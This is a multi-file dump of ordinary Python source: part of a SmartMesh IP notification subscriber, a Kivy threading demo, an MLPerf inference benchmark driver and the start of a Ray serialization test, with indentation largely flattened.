specified in the notifTypes parameter occurs. If you wish to assign
a different _callback function to different notification types,
call this function multiple times. The signature of the function
needs to be fun(<notification name>, <notification parameter>),
as described below.
        \param isRlbl Defines the type of transport used to deliver
             notifications: reliable (True) or best effort (False)
The _callback function is called with a notification name and a
notification parameter. Depending on the type of notification, the
parameter will be of a different format, according to the table below.
<table>
<tr><th>Notification Name </th><th>Parameter</th>
<tr><td>ERROR </td><td>Exception</td>
<tr><td>FINISH </td><td>''</td>
<tr><td>NOTIFLOG </td><td>Tuple_notifLog</td>
<tr><td>NOTIFDATA </td><td>Tuple_notifData</td>
<tr><td>NOTIFIPDATA </td><td>Tuple_notifIpData</td>
<tr><td>NOTIFHEALTHREPORT </td><td>Tuple_notifHealthReport</td>
<tr><td>EVENTMOTERESET </td><td>Tuple_eventMoteReset</td>
<tr><td>EVENTNETWORKRESET </td><td>Tuple_eventNetworkReset</td>
<tr><td>EVENTCOMMANDFINISHED</td><td>Tuple_eventCommandFinished</td>
<tr><td>EVENTMOTEJOIN </td><td>Tuple_eventMoteJoin</td>
<tr><td>EVENTMOTEOPERATIONAL</td><td>Tuple_eventMoteOperational</td>
<tr><td>EVENTMOTELOST </td><td>Tuple_eventMoteLost</td>
<tr><td>EVENTNETWORKTIME </td><td>Tuple_eventNetworkTime</td>
<tr><td>EVENTPINGRESPONSE </td><td>Tuple_eventPingResponse</td>
<tr><td>EVENTPATHCREATE </td><td>Tuple_eventPathCreate</td>
<tr><td>EVENTPATHDELETE </td><td>Tuple_eventPathDelete</td>
<tr><td>EVENTPACKETSENT </td><td>Tuple_eventPacketSent</td>
<tr><td>EVENTMOTECREATE </td><td>Tuple_eventMoteCreate</td>
<tr><td>EVENTMOTEDELETE </td><td>Tuple_eventMoteDelete</td>
</table>
\exception IpMgrSubscribe.SubscribeError The subscriber hasn't been
started, or the notification type(s) specified is (are) not valid.
'''
if not self._isStarted :
raise self.SubscribeError("Error: subscriber is not started")
if isinstance(notifTypes, str) :
notifTypes = [notifTypes]
for nType in notifTypes : # subscribe type validation
if nType not in self._callback :
raise self.SubscribeError("Error subscribe type: {0}".format(nType))
self._lock.acquire()
for nType in notifTypes :
self._callback[nType][1] = fun
self._callback[nType][2] = isRlbl
self._lock.release()
mask = unrlblMask = 0
# Structure of self._callback.values() :
        # [0] - subscription mask,
# [1] - cb-function. Notification is subscribed if [1]!=None,
# [2] - transport for notification: True - reliable, false - unreliable
for cb in list(self._callback.values()) :
if cb[1] :
mask = mask | cb[0]
if cb[2] == False :
unrlblMask = unrlblMask | cb[0]
if mask != self._mask or unrlblMask != self._unrlblMask :
self._mask = mask
self._unrlblMask = unrlblMask
self._con.dn_subscribe([0,self._mask], [0,self._unrlblMask])
#======================== private =========================================
def _process(self):
while True :
try :
notif = self._con.getNotification()
name = notif[0]
if name in self._trNotifNameTable :
name = self._trNotifNameTable[name]
self._processOneNotif(name, notif[0], notif[1])
except ApiException.QueueError:
self._processOneNotif(self.FINISH, self.FINISH, '')
self._isStarted = False
break
except Exception as ex :
self._processOneNotif(self.ERROR, self.ERROR, ex)
def _processOneNotif(self, notifType, notifName, payload):
cb = self._getCallback(notifType)
if cb :
cb(notifName, payload)
def _getCallback(self, name) :
res = None
self._lock.acquire()
if name in self._callback :
res = self._callback[name][1]
self._lock.release()
return res
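# --- Illustrative usage sketch (not part of the original module) ---------------
# The subscribe() docstring above describes the callback signature and the
# available notification types; the sketch below shows one way to wire them up.
# Assumptions: the enclosing class is named IpMgrSubscribe (as the docstring and
# thread name above suggest) and `connector` is an already-connected manager
# connector instance, whose creation is SDK-specific and not shown here.
def _example_subscribe(connector):
    def handle_notif(notifName, notifParams):
        # Called with the notification name and its parameter tuple.
        print("notif %s: %s" % (notifName, notifParams))
    subscriber = IpMgrSubscribe(connector)
    subscriber.start()
    # Subscribe to data and event notifications, delivered over reliable transport.
    subscriber.subscribe(
        notifTypes = [subscriber.NOTIFDATA, subscriber.NOTIFEVENT],
        fun        = handle_notif,
        isRlbl     = True,
    )
    return subscriber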
|
threaded.py
|
from kivy.app import App
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.animation import Animation
from kivy.clock import Clock, mainthread
from kivy.uix.gridlayout import GridLayout
import threading
import time
Builder.load_string("""
<AnimWidget@Widget>:
canvas:
Color:
rgba: 0.7, 0.3, 0.9, 1
Rectangle:
pos: self.pos
size: self.size
size_hint: None, None
size: 400, 30
<RootWidget>:
cols: 1
canvas:
Color:
rgba: 0.9, 0.9, 0.9, 1
Rectangle:
pos: self.pos
size: self.size
anim_box: anim_box
but_1: but_1
lab_1: lab_1
lab_2: lab_2
Button:
id: but_1
font_size: 20
text: 'Start second thread'
on_press: root.start_second_thread(lab_2.text)
Label:
id: lab_1
font_size: 30
color: 0.6, 0.6, 0.6, 1
text_size: self.width, None
halign: 'center'
AnchorLayout:
id: anim_box
Label:
id: lab_2
font_size: 100
color: 0.8, 0, 0, 1
text: '3'
""")
class RootWidget(GridLayout):
stop = threading.Event()
def start_second_thread(self, l_text):
threading.Thread(target=self.second_thread, args=(l_text,)).start()
def second_thread(self, label_text):
# Remove a widget, update a widget property, create a new widget,
# add it and animate it in the main thread by scheduling a function
# call with Clock.
Clock.schedule_once(self.start_test, 0)
# Do some thread blocking operations.
time.sleep(5)
l_text = str(int(label_text) * 3000)
# Update a widget property in the main thread by decorating the
# called function with @mainthread.
self.update_label_text(l_text)
# Do some more blocking operations.
time.sleep(2)
# Remove some widgets and update some properties in the main thread
# by decorating the called function with @mainthread.
self.stop_test()
# Start a new thread with an infinite loop and stop the current one.
threading.Thread(target=self.infinite_loop).start()
def start_test(self, *args):
# Remove the button.
self.remove_widget(self.but_1)
# Update a widget property.
self.lab_1.text = ('The UI remains responsive while the '
'second thread is running.')
# Create and add a new widget.
anim_bar = Factory.AnimWidget()
self.anim_box.add_widget(anim_bar)
# Animate the added widget.
anim = Animation(opacity=0.3, width=100, duration=0.6)
anim += Animation(opacity=1, width=400, duration=0.8)
anim.repeat = True
anim.start(anim_bar)
@mainthread
def update_label_text(self, new_text):
self.lab_2.text = new_text
@mainthread
def stop_test(self):
self.lab_1.text = ('Second thread exited, a new thread has started. '
'Close the app to exit the new thread and stop '
'the main process.')
self.lab_2.text = str(int(self.lab_2.text) + 1)
self.remove_widget(self.anim_box)
def infinite_loop(self):
iteration = 0
while True:
if self.stop.is_set():
# Stop running this thread so the main Python process can exit.
return
iteration += 1
print('Infinite loop, iteration {}.'.format(iteration))
time.sleep(1)
class ThreadedApp(App):
def on_stop(self):
# The Kivy event loop is about to stop, set a stop signal;
# otherwise the app window will close, but the Python process will
# keep running until all secondary threads exit.
self.root.stop.set()
def build(self):
return RootWidget()
if __name__ == '__main__':
ThreadedApp().run()
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import glob
import json
import logging
import os
import shutil
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
import accuracy
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_ncore":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommonNcore(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet_ncore":
(imagenet.Imagenet, dataset.pre_process_mobilenet_uint8, dataset.PostProcessArgMaxNcore(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-ncore":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCocoNcore(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-pt-calibrate":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True, "calibrate": True, "split": "train2017"}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# Pre-defined command line options to simplify things. They are used as defaults and can be
# overridden from the command line.
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf-calibrate": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tflite-calibrate",
"model-name": "resnet50",
},
"resnet50-tf-ncore": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet_ncore",
"backend": "tflite-ncore-resnet",
"model-name": "resnet50",
},
"resnet50-tf-ncore-offline": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet_ncore",
"backend": "tflite-ncore-resnet-offline",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-tf-ncore": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet_ncore",
"backend": "tflite-ncore-mobilenet",
"model-name": "mobilenet",
},
"mobilenet-tf-ncore-offline": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet_ncore",
"backend": "tflite-ncore-mobilenet-offline",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-tflite": {
"inputs": "image_tensor:0",
"outputs": "detection_boxes:0,detection_classes:0,detection_scores:0,num_detections:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-tf-ncore": {
"inputs": "image_tensor:0",
"outputs": "detection_boxes:0,detection_classes:0,detection_scores:0,num_detections:0",
"dataset": "coco-300-ncore",
"backend": "tflite-ncore-ssd",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-tf-ncore-offline": {
"inputs": "image_tensor:0",
"outputs": "detection_boxes:0,detection_classes:0,detection_scores:0,num_detections:0",
"dataset": "coco-300-ncore",
"backend": "tflite-ncore-ssd-offline",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch-calibrate": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native-calibrate",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
args = parser.parse_args()
    # Don't use defaults in argparse. Instead we default to a dict, override that with a profile,
    # and take this as the default unless the command line gives a value.
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
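# Illustrative sketch only (never called by the benchmark): get_args() above
# merges options with the precedence built-in defaults < selected profile <
# explicit command-line values. The simulated argparse values below are made up
# for demonstration; the profile name is one of the real SUPPORTED_PROFILES keys.
def _option_precedence_example():
    merged = dict(SUPPORTED_PROFILES["defaults"])              # lowest precedence
    merged.update(SUPPORTED_PROFILES["resnet50-onnxruntime"])  # profile overrides defaults
    # Simulated argparse namespace: None means "not given on the command line".
    cli = {"backend": None, "max_batchsize": 8, "model_name": None}
    for k, v in merged.items():
        kc = k.replace("-", "_")
        if cli.get(kc) is None:
            cli[kc] = v                                        # fill only missing values
    return cli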
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "pytorch-centaur":
from backend_pytorch_centaur import BackendPytorchCentaur
backend = BackendPytorchCentaur()
elif backend == "pytorch-native-calibrate":
from backend_pytorch_native_calibrate import BackendPytorchNativeCalibrate
backend = BackendPytorchNativeCalibrate()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
elif backend == "tflite-calibrate":
from backend_tflite_calibrate import BackendTflite
backend = BackendTflite()
elif backend == "tflite-ncore":
from backend_tflite_ncore import BackendTfliteNcore
backend = BackendTfliteNcore()
elif backend == "tflite-ncore-mobilenet":
from backend_libncoretflite import BackendTfliteNcoreMobileNetV1
backend = BackendTfliteNcoreMobileNetV1()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-resnet":
from backend_libncoretflite import BackendTfliteNcoreResnet
backend = BackendTfliteNcoreResnet()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-ssd":
from backend_libncoretflite import BackendTfliteNcoreSSD
backend = BackendTfliteNcoreSSD()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-mobilenet-offline":
from backend_libncoretflite import BackendTfliteNcoreMobileNetV1Offline
backend = BackendTfliteNcoreMobileNetV1Offline()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-resnet-offline":
from backend_libncoretflite import BackendTfliteNcoreResnetOffline
backend = BackendTfliteNcoreResnetOffline()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-ssd-offline":
from backend_libncoretflite import BackendTfliteNcoreSSDOffline
backend = BackendTfliteNcoreSSDOffline()
backend.inputs = ["image_tensor:0"]
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) <= self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
                # None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) <= self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
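# Minimal standalone sketch of the Queue + "poison pill" shutdown pattern that
# QueueRunner uses above: workers block on get(), and one None per worker tells
# it to exit. The squaring "work" is a made-up stand-in for run_one_item(); this
# helper is illustrative only and never called by the benchmark.
def _poison_pill_pool_example(num_workers=2, num_items=10):
    tasks = Queue()
    results = []
    def worker():
        while True:
            item = tasks.get()
            if item is None:               # poison pill: time to exit
                tasks.task_done()
                break
            results.append(item * item)    # stand-in for real work
            tasks.task_done()
    workers = [threading.Thread(target=worker, daemon=True) for _ in range(num_workers)]
    for w in workers:
        w.start()
    for i in range(num_items):
        tasks.put(i)
    for _ in workers:
        tasks.put(None)                    # one pill per worker
    for w in workers:
        w.join()
    return sorted(results)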
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
if getattr(backend, "max_batchsize", -1) != -1:
backend.max_batchsize = args.max_batchsize
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
audit_config_cp_loc = None
    # Default to the current directory so the summary and accuracy files below
    # can still be located when --output is not given.
    output_dir = os.path.abspath(args.output) if args.output else os.getcwd()
    if args.output:
        os.makedirs(output_dir, exist_ok=True)
        # Check whether an audit.config file is used; copy it to the output
        # directory before we chdir to that location so loadgen can find it.
audit_files = glob.glob("ncoresw/mlperf/vision/classification_and_detection/*audit.config")
if len(audit_files):
log.info("Found audit.config (" + audit_files[0] + ")")
audit_config_cp_loc = os.path.join(output_dir, "audit.config")
            # If the user already put an audit.config in the `output` directory,
            # use that one. Otherwise, copy the one we found in the current
            # directory (before we chdir to the new output directory).
if os.path.exists(audit_config_cp_loc):
log.info("WARNING: audit.config already exists, so cannot copy over new audit file!")
log.info(audit_config_cp_loc)
audit_config_cp_loc = None
else:
shutil.copy(audit_files[0], audit_config_cp_loc)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
warmup_queries = range(args.max_batchsize)
ds.load_query_samples(warmup_queries)
for _ in range(2):
img, _ = ds.get_samples(warmup_queries)
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
# override target latency when it needs to be less than 1ms
if args.model_name == "mobilenet":
settings.single_stream_expected_latency_ns = 200000
elif args.model_name == "resnet50":
settings.single_stream_expected_latency_ns = 900000
elif args.model_name == "ssd-mobilenet":
settings.single_stream_expected_latency_ns = 900000
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 1024), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
# Dump the summary logs to stdout for convenience
log.info("Output dir: " + os.path.abspath(output_dir))
with open(os.path.join(output_dir, "mlperf_log_summary.txt"), 'r') as f:
log.info(f.read())
# Output accuracy txt file
if args.accuracy:
with open(os.path.join(output_dir, "accuracy.txt"), "w") as f_acc:
# SSD accuracy calculation
#----------------------------------------
            # The mAP is already stored in result_dict["mAP"], but we call
            # accuracy.CocoAcc() here to keep the submission process consistent.
if args.model_name == "ssd-mobilenet":
accuracy_str = accuracy.CocoAcc(
mlperf_accuracy_file = os.path.join(output_dir, "mlperf_log_accuracy.json"),
coco_dir = args.dataset_path
).get_accuracy() + "\n"
f_acc.write(accuracy_str)
log.info(accuracy_str)
if args.model_name == "ssd-resnet34":
accuracy_str = accuracy.CocoAcc(
mlperf_accuracy_file = os.path.join(output_dir, "mlperf_log_accuracy.json"),
coco_dir = args.dataset_path,
use_inv_map = True,
remove_48_empty_images = False
).get_accuracy() + "\n"
f_acc.write(accuracy_str)
log.info(accuracy_str)
# ImageNet accuracy calculation
#----------------------------------------
            # The good / total values are already stored in result_dict["good"]
            # and result_dict["total"], but we call accuracy.ImagenetAcc() here
            # to keep the submission process consistent.
else:
accuracy_str = accuracy.ImagenetAcc(
mlperf_accuracy_file = os.path.join(output_dir, "mlperf_log_accuracy.json"),
imagenet_val_file = os.path.join(args.dataset_path, "val_map.txt")
).get_accuracy() + "\n"
f_acc.write(accuracy_str)
log.info(accuracy_str)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
    if audit_config_cp_loc is not None:
os.remove(audit_config_cp_loc)
backend_destroy = getattr(backend, "destroy", None)
if callable(backend_destroy):
backend.destroy()
if __name__ == "__main__":
main()
|
test_basic.py
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.tests.cluster_utils
import ray.tests.utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
